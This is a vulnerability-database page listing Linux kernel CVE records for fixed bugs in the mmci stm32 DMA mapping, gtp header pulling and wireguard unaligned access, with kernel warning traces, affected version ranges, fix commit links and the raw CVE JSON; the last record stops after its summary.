In the Linux kernel, the following vulnerability has been resolved: mmc: mmci: stm32: fix DMA API overlapping mappings warning Turning on CONFIG_DMA_API_DEBUG_SG results in the following warning: DMA-API: mmci-pl18x 48220000.mmc: cacheline tracking EEXIST, overlapping mappings aren't supported WARNING: CPU: 1 PID: 51 at kernel/dma/debug.c:568 add_dma_entry+0x234/0x2f4 Modules linked in: CPU: 1 PID: 51 Comm: kworker/1:2 Not tainted 6.1.28 #1 Hardware name: STMicroelectronics STM32MP257F-EV1 Evaluation Board (DT) Workqueue: events_freezable mmc_rescan Call trace: add_dma_entry+0x234/0x2f4 debug_dma_map_sg+0x198/0x350 __dma_map_sg_attrs+0xa0/0x110 dma_map_sg_attrs+0x10/0x2c sdmmc_idma_prep_data+0x80/0xc0 mmci_prep_data+0x38/0x84 mmci_start_data+0x108/0x2dc mmci_request+0xe4/0x190 __mmc_start_request+0x68/0x140 mmc_start_request+0x94/0xc0 mmc_wait_for_req+0x70/0x100 mmc_send_tuning+0x108/0x1ac sdmmc_execute_tuning+0x14c/0x210 mmc_execute_tuning+0x48/0xec mmc_sd_init_uhs_card.part.0+0x208/0x464 mmc_sd_init_card+0x318/0x89c mmc_attach_sd+0xe4/0x180 mmc_rescan+0x244/0x320 DMA API debug brings to light leaking dma-mappings as dma_map_sg and dma_unmap_sg are not correctly balanced. If an error occurs in mmci_cmd_irq function, only mmci_dma_error function is called and as this API is not managed on stm32 variant, dma_unmap_sg is never called in this error path.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0224cbc53ba82b84a…
	https://git.kernel.org/stable/c/5ae5060e17a3fc38e…
	https://git.kernel.org/stable/c/70af82bb9c897faa2…
	https://git.kernel.org/stable/c/176e66269f0de3273…
	https://git.kernel.org/stable/c/d610a307225951929…
	https://git.kernel.org/stable/c/6b1ba3f9040be5efc…

Impacted products

Vendor

Product

Version

Linux

Affected: 46b723dd867d599420fb640c0eaf2a866ef721d4 , < 0224cbc53ba82b84affa7619b6d1b1a254bc2c53 (git)
Affected: 46b723dd867d599420fb640c0eaf2a866ef721d4 , < 5ae5060e17a3fc38e54c3e5bd8abd6b1d5bfae7c (git)
Affected: 46b723dd867d599420fb640c0eaf2a866ef721d4 , < 70af82bb9c897faa25a44e4181f36c60312b71ef (git)
Affected: 46b723dd867d599420fb640c0eaf2a866ef721d4 , < 176e66269f0de327375fc0ea51c12c2f5a97e4c4 (git)
Affected: 46b723dd867d599420fb640c0eaf2a866ef721d4 , < d610a307225951929b9dff807788439454476f85 (git)
Affected: 46b723dd867d599420fb640c0eaf2a866ef721d4 , < 6b1ba3f9040be5efc4396d86c9752cdc564730be (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.10.213 , ≤ 5.10.* (semver)
Unaffected: 5.15.152 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.21 , ≤ 6.6.* (semver)
Unaffected: 6.7.9 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.461Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0224cbc53ba82b84affa7619b6d1b1a254bc2c53"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5ae5060e17a3fc38e54c3e5bd8abd6b1d5bfae7c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/70af82bb9c897faa25a44e4181f36c60312b71ef"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/176e66269f0de327375fc0ea51c12c2f5a97e4c4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d610a307225951929b9dff807788439454476f85"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6b1ba3f9040be5efc4396d86c9752cdc564730be"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26787",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:51:02.092511Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:51.566Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/mmc/host/mmci_stm32_sdmmc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0224cbc53ba82b84affa7619b6d1b1a254bc2c53",
              "status": "affected",
              "version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
              "versionType": "git"
            },
            {
              "lessThan": "5ae5060e17a3fc38e54c3e5bd8abd6b1d5bfae7c",
              "status": "affected",
              "version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
              "versionType": "git"
            },
            {
              "lessThan": "70af82bb9c897faa25a44e4181f36c60312b71ef",
              "status": "affected",
              "version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
              "versionType": "git"
            },
            {
              "lessThan": "176e66269f0de327375fc0ea51c12c2f5a97e4c4",
              "status": "affected",
              "version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
              "versionType": "git"
            },
            {
              "lessThan": "d610a307225951929b9dff807788439454476f85",
              "status": "affected",
              "version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
              "versionType": "git"
            },
            {
              "lessThan": "6b1ba3f9040be5efc4396d86c9752cdc564730be",
              "status": "affected",
              "version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/mmc/host/mmci_stm32_sdmmc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.213",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.152",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.21",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.213",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.152",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.21",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.9",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: mmci: stm32: fix DMA API overlapping mappings warning\n\nTurning on CONFIG_DMA_API_DEBUG_SG results in the following warning:\n\nDMA-API: mmci-pl18x 48220000.mmc: cacheline tracking EEXIST,\noverlapping mappings aren\u0027t supported\nWARNING: CPU: 1 PID: 51 at kernel/dma/debug.c:568\nadd_dma_entry+0x234/0x2f4\nModules linked in:\nCPU: 1 PID: 51 Comm: kworker/1:2 Not tainted 6.1.28 #1\nHardware name: STMicroelectronics STM32MP257F-EV1 Evaluation Board (DT)\nWorkqueue: events_freezable mmc_rescan\nCall trace:\nadd_dma_entry+0x234/0x2f4\ndebug_dma_map_sg+0x198/0x350\n__dma_map_sg_attrs+0xa0/0x110\ndma_map_sg_attrs+0x10/0x2c\nsdmmc_idma_prep_data+0x80/0xc0\nmmci_prep_data+0x38/0x84\nmmci_start_data+0x108/0x2dc\nmmci_request+0xe4/0x190\n__mmc_start_request+0x68/0x140\nmmc_start_request+0x94/0xc0\nmmc_wait_for_req+0x70/0x100\nmmc_send_tuning+0x108/0x1ac\nsdmmc_execute_tuning+0x14c/0x210\nmmc_execute_tuning+0x48/0xec\nmmc_sd_init_uhs_card.part.0+0x208/0x464\nmmc_sd_init_card+0x318/0x89c\nmmc_attach_sd+0xe4/0x180\nmmc_rescan+0x244/0x320\n\nDMA API debug brings to light leaking dma-mappings as dma_map_sg and\ndma_unmap_sg are not correctly balanced.\n\nIf an error occurs in mmci_cmd_irq function, only mmci_dma_error\nfunction is called and as this API is not managed on stm32 variant,\ndma_unmap_sg is never called in this error path."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:56:31.080Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0224cbc53ba82b84affa7619b6d1b1a254bc2c53"
        },
        {
          "url": "https://git.kernel.org/stable/c/5ae5060e17a3fc38e54c3e5bd8abd6b1d5bfae7c"
        },
        {
          "url": "https://git.kernel.org/stable/c/70af82bb9c897faa25a44e4181f36c60312b71ef"
        },
        {
          "url": "https://git.kernel.org/stable/c/176e66269f0de327375fc0ea51c12c2f5a97e4c4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d610a307225951929b9dff807788439454476f85"
        },
        {
          "url": "https://git.kernel.org/stable/c/6b1ba3f9040be5efc4396d86c9752cdc564730be"
        }
      ],
      "title": "mmc: mmci: stm32: fix DMA API overlapping mappings warning",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26787",
    "datePublished": "2024-04-04T08:20:19.751Z",
    "dateReserved": "2024-02-19T14:20:24.178Z",
    "dateUpdated": "2025-05-04T08:56:31.080Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-44999 (GCVE-0-2024-44999)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

gtp: pull network headers in gtp_dev_xmit()

Summary

In the Linux kernel, the following vulnerability has been resolved: gtp: pull network headers in gtp_dev_xmit() syzbot/KMSAN reported use of uninit-value in get_dev_xmit() [1] We must make sure the IPv4 or Ipv6 header is pulled in skb->head before accessing fields in them. Use pskb_inet_may_pull() to fix this issue. [1] BUG: KMSAN: uninit-value in ipv6_pdp_find drivers/net/gtp.c:220 [inline] BUG: KMSAN: uninit-value in gtp_build_skb_ip6 drivers/net/gtp.c:1229 [inline] BUG: KMSAN: uninit-value in gtp_dev_xmit+0x1424/0x2540 drivers/net/gtp.c:1281 ipv6_pdp_find drivers/net/gtp.c:220 [inline] gtp_build_skb_ip6 drivers/net/gtp.c:1229 [inline] gtp_dev_xmit+0x1424/0x2540 drivers/net/gtp.c:1281 __netdev_start_xmit include/linux/netdevice.h:4913 [inline] netdev_start_xmit include/linux/netdevice.h:4922 [inline] xmit_one net/core/dev.c:3580 [inline] dev_hard_start_xmit+0x247/0xa20 net/core/dev.c:3596 __dev_queue_xmit+0x358c/0x5610 net/core/dev.c:4423 dev_queue_xmit include/linux/netdevice.h:3105 [inline] packet_xmit+0x9c/0x6c0 net/packet/af_packet.c:276 packet_snd net/packet/af_packet.c:3145 [inline] packet_sendmsg+0x90e3/0xa3a0 net/packet/af_packet.c:3177 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x30f/0x380 net/socket.c:745 __sys_sendto+0x685/0x830 net/socket.c:2204 __do_sys_sendto net/socket.c:2216 [inline] __se_sys_sendto net/socket.c:2212 [inline] __x64_sys_sendto+0x125/0x1d0 net/socket.c:2212 x64_sys_call+0x3799/0x3c10 arch/x86/include/generated/asm/syscalls_64.h:45 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: slab_post_alloc_hook mm/slub.c:3994 [inline] slab_alloc_node mm/slub.c:4037 [inline] kmem_cache_alloc_node_noprof+0x6bf/0xb80 mm/slub.c:4080 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:583 __alloc_skb+0x363/0x7b0 net/core/skbuff.c:674 alloc_skb include/linux/skbuff.h:1320 [inline] alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6526 sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2815 packet_alloc_skb net/packet/af_packet.c:2994 [inline] packet_snd net/packet/af_packet.c:3088 [inline] packet_sendmsg+0x749c/0xa3a0 net/packet/af_packet.c:3177 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x30f/0x380 net/socket.c:745 __sys_sendto+0x685/0x830 net/socket.c:2204 __do_sys_sendto net/socket.c:2216 [inline] __se_sys_sendto net/socket.c:2212 [inline] __x64_sys_sendto+0x125/0x1d0 net/socket.c:2212 x64_sys_call+0x3799/0x3c10 arch/x86/include/generated/asm/syscalls_64.h:45 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f CPU: 0 UID: 0 PID: 7115 Comm: syz.1.515 Not tainted 6.11.0-rc1-syzkaller-00043-g94ede2a3e913 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 06/27/2024

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3d89d0c4a1c6d4d2a…
	https://git.kernel.org/stable/c/f5dda8db382c5751c…
	https://git.kernel.org/stable/c/cbb9a969fc190e851…
	https://git.kernel.org/stable/c/1f6b62392453d8f36…
	https://git.kernel.org/stable/c/137d565ab89ce3584…
	https://git.kernel.org/stable/c/34ba4f29f3d9eb52d…
	https://git.kernel.org/stable/c/3939d787139e359b7…
	https://git.kernel.org/stable/c/3a3be7ff9224f424e…

Impacted products

Vendor

Product

Version

Linux

Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 3d89d0c4a1c6d4d2a755e826351b0a101dbc86f3 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < f5dda8db382c5751c4e572afc7c99df7da1f83ca (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < cbb9a969fc190e85195d1b0f08038e7f6199044e (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 1f6b62392453d8f36685d19b761307a8c5617ac1 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 137d565ab89ce3584503b443bc9e00d44f482593 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 34ba4f29f3d9eb52dee37512059efb2afd7e966f (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 3939d787139e359b77aaf9485d1e145d6713d7b9 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 3a3be7ff9224f424e485287b54be00d2c6bd9c40 (git)

Linux

Affected: 4.7
Unaffected: 0 , < 4.7 (semver)
Unaffected: 4.19.321 , ≤ 4.19.* (semver)
Unaffected: 5.4.283 , ≤ 5.4.* (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44999",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-04T20:18:58.731411Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-04T20:19:12.864Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:57.080Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/gtp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3d89d0c4a1c6d4d2a755e826351b0a101dbc86f3",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "f5dda8db382c5751c4e572afc7c99df7da1f83ca",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "cbb9a969fc190e85195d1b0f08038e7f6199044e",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "1f6b62392453d8f36685d19b761307a8c5617ac1",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "137d565ab89ce3584503b443bc9e00d44f482593",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "34ba4f29f3d9eb52dee37512059efb2afd7e966f",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "3939d787139e359b77aaf9485d1e145d6713d7b9",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "3a3be7ff9224f424e485287b54be00d2c6bd9c40",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/gtp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7"
            },
            {
              "lessThan": "4.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.321",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.283",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.321",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.283",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: pull network headers in gtp_dev_xmit()\n\nsyzbot/KMSAN reported use of uninit-value in get_dev_xmit() [1]\n\nWe must make sure the IPv4 or Ipv6 header is pulled in skb-\u003ehead\nbefore accessing fields in them.\n\nUse pskb_inet_may_pull() to fix this issue.\n\n[1]\nBUG: KMSAN: uninit-value in ipv6_pdp_find drivers/net/gtp.c:220 [inline]\n BUG: KMSAN: uninit-value in gtp_build_skb_ip6 drivers/net/gtp.c:1229 [inline]\n BUG: KMSAN: uninit-value in gtp_dev_xmit+0x1424/0x2540 drivers/net/gtp.c:1281\n  ipv6_pdp_find drivers/net/gtp.c:220 [inline]\n  gtp_build_skb_ip6 drivers/net/gtp.c:1229 [inline]\n  gtp_dev_xmit+0x1424/0x2540 drivers/net/gtp.c:1281\n  __netdev_start_xmit include/linux/netdevice.h:4913 [inline]\n  netdev_start_xmit include/linux/netdevice.h:4922 [inline]\n  xmit_one net/core/dev.c:3580 [inline]\n  dev_hard_start_xmit+0x247/0xa20 net/core/dev.c:3596\n  __dev_queue_xmit+0x358c/0x5610 net/core/dev.c:4423\n  dev_queue_xmit include/linux/netdevice.h:3105 [inline]\n  packet_xmit+0x9c/0x6c0 net/packet/af_packet.c:276\n  packet_snd net/packet/af_packet.c:3145 [inline]\n  packet_sendmsg+0x90e3/0xa3a0 net/packet/af_packet.c:3177\n  sock_sendmsg_nosec net/socket.c:730 [inline]\n  __sock_sendmsg+0x30f/0x380 net/socket.c:745\n  __sys_sendto+0x685/0x830 net/socket.c:2204\n  __do_sys_sendto net/socket.c:2216 [inline]\n  __se_sys_sendto net/socket.c:2212 [inline]\n  __x64_sys_sendto+0x125/0x1d0 net/socket.c:2212\n  x64_sys_call+0x3799/0x3c10 arch/x86/include/generated/asm/syscalls_64.h:45\n  do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n  do_syscall_64+0xcd/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nUninit was created at:\n  slab_post_alloc_hook mm/slub.c:3994 [inline]\n  slab_alloc_node mm/slub.c:4037 [inline]\n  kmem_cache_alloc_node_noprof+0x6bf/0xb80 mm/slub.c:4080\n  kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:583\n  __alloc_skb+0x363/0x7b0 net/core/skbuff.c:674\n  alloc_skb include/linux/skbuff.h:1320 [inline]\n  alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6526\n  sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2815\n  packet_alloc_skb net/packet/af_packet.c:2994 [inline]\n  packet_snd net/packet/af_packet.c:3088 [inline]\n  packet_sendmsg+0x749c/0xa3a0 net/packet/af_packet.c:3177\n  sock_sendmsg_nosec net/socket.c:730 [inline]\n  __sock_sendmsg+0x30f/0x380 net/socket.c:745\n  __sys_sendto+0x685/0x830 net/socket.c:2204\n  __do_sys_sendto net/socket.c:2216 [inline]\n  __se_sys_sendto net/socket.c:2212 [inline]\n  __x64_sys_sendto+0x125/0x1d0 net/socket.c:2212\n  x64_sys_call+0x3799/0x3c10 arch/x86/include/generated/asm/syscalls_64.h:45\n  do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n  do_syscall_64+0xcd/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nCPU: 0 UID: 0 PID: 7115 Comm: syz.1.515 Not tainted 6.11.0-rc1-syzkaller-00043-g94ede2a3e913 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 06/27/2024"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:43.857Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3d89d0c4a1c6d4d2a755e826351b0a101dbc86f3"
        },
        {
          "url": "https://git.kernel.org/stable/c/f5dda8db382c5751c4e572afc7c99df7da1f83ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/cbb9a969fc190e85195d1b0f08038e7f6199044e"
        },
        {
          "url": "https://git.kernel.org/stable/c/1f6b62392453d8f36685d19b761307a8c5617ac1"
        },
        {
          "url": "https://git.kernel.org/stable/c/137d565ab89ce3584503b443bc9e00d44f482593"
        },
        {
          "url": "https://git.kernel.org/stable/c/34ba4f29f3d9eb52dee37512059efb2afd7e966f"
        },
        {
          "url": "https://git.kernel.org/stable/c/3939d787139e359b77aaf9485d1e145d6713d7b9"
        },
        {
          "url": "https://git.kernel.org/stable/c/3a3be7ff9224f424e485287b54be00d2c6bd9c40"
        }
      ],
      "title": "gtp: pull network headers in gtp_dev_xmit()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44999",
    "datePublished": "2024-09-04T19:54:43.601Z",
    "dateReserved": "2024-08-21T05:34:56.672Z",
    "dateUpdated": "2025-11-03T22:14:57.080Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42247 (GCVE-0-2024-42247)

Vulnerability from cvelistv5 – Published: 2024-08-07 15:14 – Updated: 2025-11-03 22:02

Title

wireguard: allowedips: avoid unaligned 64-bit memory accesses

Summary

In the Linux kernel, the following vulnerability has been resolved: wireguard: allowedips: avoid unaligned 64-bit memory accesses On the parisc platform, the kernel issues kernel warnings because swap_endian() tries to load a 128-bit IPv6 address from an unaligned memory location: Kernel: unaligned access to 0x55f4688c in wg_allowedips_insert_v6+0x2c/0x80 [wireguard] (iir 0xf3010df) Kernel: unaligned access to 0x55f46884 in wg_allowedips_insert_v6+0x38/0x80 [wireguard] (iir 0xf2010dc) Avoid such unaligned memory accesses by instead using the get_unaligned_be64() helper macro. [Jason: replace src[8] in original patch with src+8]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

